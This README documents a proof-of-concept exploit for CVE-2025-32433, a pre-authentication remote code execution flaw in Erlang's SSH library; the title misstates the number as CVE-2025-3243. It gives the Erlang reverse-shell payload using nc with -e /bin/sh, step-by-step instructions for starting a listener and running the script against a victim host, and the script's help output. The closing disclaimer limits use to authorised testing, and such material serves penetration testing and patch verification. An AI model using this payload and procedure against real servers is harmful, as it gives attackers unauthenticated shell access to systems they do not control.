Exploit for CVE-2025-3243

A proof-of-concept exploit for **CVE-2025-32433**, a critical vulnerability in Erlang’s SSH library that allows pre-authenticated code execution via malformed `SSH_MSG_CHANNEL_REQUEST` packets.

—

## Features

– **Original exploit** by Matthew Keeley
– **Updated version** by Tyler Ramsbey:
– Command‑line arguments for **LHOST**, **LPORT**, **RHOST**, and **RPORT**
– Built‑in help and usage via `argparse`
– Erlang‑style reverse shell payload using `os:cmd(“nc LHOST LPORT -e /bin/sh”).`
– Clean function decomposition and status logging for each stage

—

## Prerequisites

– **Python 3**
– A working `nc` (Netcat) listener on your attack machine
– Network access to the target SSH service (default port `22`)

—

## Usage

1. **Start your listener** on the attack box:

“`sh
nc -lvnp 4444
“`

2. **Run the exploit**:

“`sh
python3 CVE-2025-32433.py -lh [Attacker-IP] -lp [Attacker-Port] -rh [Victim-IP] -rp [Victim-Port]
“`

3. **Wait for the shell** to connect back to your listener.

### Help Menu

“`sh
$ python3 CVE-2025-32433.py -h
usage: CVE-2025-32433.py [-h] -lh LHOST -lp LPORT [-rh RHOST] [-rp RPORT]

Send a pre-auth SSH channel request with an Erlang RCE payload
to get a reverse shell

optional arguments:
-h, –help show this help message and exit
-lh LHOST, –lhost LHOST
Local host/IP to receive the reverse shell
-lp LPORT, –lport LPORT
Local port to receive the reverse shell
-rh RHOST, –rhost RHOST
Target SSH server IP (default: 10.10.248.101)
-rp RPORT, –rport RPORT
Target SSH server port (default: 22)
“`

—

## Credits

– **Original script** by Matthew Keeley ([MattKeeley](https://github.com/MattKeeley))
– **This updated version** by Tyler Ramsbey

—

## Disclaimer

Use this code only on systems you own or have explicit permission to test. Unauthorized exploitation of vulnerabilities is illegal and unethical.